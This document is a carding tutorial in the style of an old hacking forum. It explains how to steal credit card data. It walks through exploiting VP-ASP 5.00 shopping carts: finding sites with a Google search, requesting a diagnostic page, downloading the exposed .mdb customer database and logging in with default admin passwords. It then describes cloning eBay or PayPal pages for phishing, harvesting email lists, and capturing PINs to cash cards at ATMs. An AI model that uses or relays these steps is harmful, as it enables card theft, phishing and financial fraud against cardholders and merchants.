Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
•Credit Card Scams ( usually used for earning money , some times for shopping )
•Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping
on internet, or for fun, or any way but not for cashing – because you will not get PIN from
this method only gives cc number , cvv2 and other basic info.
Hacking VP-ASP SHOP
I hope you will see whenever you try to buy some thing on internet with CC, they show
you a very secure, well programmed form. They are carts, like vp-asp xcarts. Specific
sites are not hacked, but carts are hacked-able.
Below I’m posting tutorial to hack VP ASP cart. Now every site which use that cart can be
hacked, and through their *mdb file you can get their clients ’credit card details’, company
secrets.
Lets get started:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple…
Go to google.com and type: VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let’s go to the exploit..
The page will be like this: **://*.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: **://*.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
•xDatabase
•shopping140
•xDblocation
•resx
•xdatabasetypexEmailxEmail
NamexEmailSubjectxEmailSy
stemxEmailTypexOrdernumbe r
Example:
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: **://*.victim.com/shop/shopping140.mdb
If you didn’t download the Database, try this while there is dblocation:
xDblocation
resx
The url will be: **://*.victim.com/shop/resx/shopping140.mdb
If you see the error message you have to try this :
**://*.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you
should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to
find the admin username and password for the website.
The admin login page is usually located here: **://*.victim.com/shop/shopadmin.asp
Incorrect, or you cannot find the mdb file at all, then try to find the admin login page and
enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Scam
This method is usually used to hack for earning money. What happens in this method is
you create a clone page.
Target: its basically eBay.com or paypal.com for general credit cards, or if you want to
target any specific cashable bank like regionbank.com then you have to create a clone
page for that bank.
What is eBay.com?
Its a shopping site world wide which is used by many of billion people which use their
credit cards on ebay. What you do make a similar page same as eBay and upload it on
some hosting which don’t have any law restrictions, try to find hosting in Europe they will
make your scam up for long time, and email the users of eBay
How to get the emails of their users?
Go to google.com and type “Email Harvestor” or any Email Spider and search for eBay
Buyers and eBay Sellers and you will get long list. That list is not accurate but out of 1000
at least 1 email would be valid. At least you will get some time.
Well you create a clone page of ebay, and mail the list you create from spider with ask
them to visit the link below and enter your info billing, and the scam page have
programming when they enter their info it comes directly to your email. In the form page
you have PIN required so you also get the PIN number through which you can cash
through ATM .
Now if you run ebay scam or paypal scam, its up to your luck who’s your victim. A client
of bank of america or of citibank or of region, its about luck, maybe you get cashable,
may be you don’t its just luck, nothing else.
